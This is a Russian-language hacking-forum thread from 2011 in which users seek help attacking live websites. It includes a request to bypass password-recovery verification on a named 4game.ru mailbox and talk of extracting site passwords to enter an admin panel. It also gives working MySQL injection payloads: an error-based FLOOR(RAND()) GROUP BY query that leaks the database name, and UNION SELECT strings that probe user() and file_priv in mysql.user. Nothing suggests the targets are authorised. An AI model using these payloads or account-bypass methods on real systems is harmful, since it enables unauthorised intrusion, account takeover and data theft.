ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.05.2011, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
6242
Репутация:
0
|
|
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
|
|
|
|
14.05.2011, 18:23
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Kn[1
Fe^^"]
Kn[1]Fe^^ said:
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
Подставив кавычку ты закон не нарушал, так что врятли
|
|
|
14.05.2011, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
6242
Репутация:
0
|
|
Ок. А если пароли из саита вытащил и зашел через админку?
|
|
|
|
29.05.2011, 16:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Нужно восстановить пасс и обойти проверку на 4game.ru
восставливаем пасс на ящик enegeor2@ya.ru, требует подтверждение на мобил. телефон или доп почту - возможно ли как-то обойти подтверждение? раньше можно было менять код запроса, т.к. не было проверки.. http://www.youtube.com/watch?v=oHb_FcDzAYY&feature=player_embedded
|
|
|
|
30.05.2011, 21:48
|
|
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
Провел на форуме:
2312554
Репутация:
97
|
|
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
|
|
|
|
30.05.2011, 23:12
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
Сообщение от seofilms
seofilms said:
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
Скули как скули. live http headers, чтобы удобнее, и крути.
|
|
|
|
04.07.2011, 20:06
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
Провел на форуме:
354141
Репутация:
0
|
|
Есть сайт с sql инъекцией, в авторизации. Поля login и password. На запись и чтение прав нету, вывести информацию не получается. Известно название базы данных, логин на вход в базу, таблица с пользователями, количество и названия колонок.
Что ещё можно сделать с этим всем?
|
|
|
|
04.07.2011, 23:57
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
Провел на форуме:
354141
Репутация:
0
|
|
Использую конструкцию:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --
Выдаёт ошибку, но команду не выполняет:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1
В итоге возникает вопрос. Как заставить выполниться команду
Сообщение от None
SELECT user_1 FROM users
Название столбца и таблицы точно эти. |
|
|
|
11.07.2011, 13:51
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
Провел на форуме:
11373
Репутация:
0
|
|
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
|
|
|
|
11.07.2011, 15:57
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Sloneny
Sloneny said:
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
нет доступа к базе mysql
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Kn[1]Fe^^](/avatars/avatar.jpg?2676133){kind=avatar}
![Аватар для Kn[1]Fe^^](/avatars/avatar.jpg?2676162){kind=avatar}
Похожие темы
Линейный вид
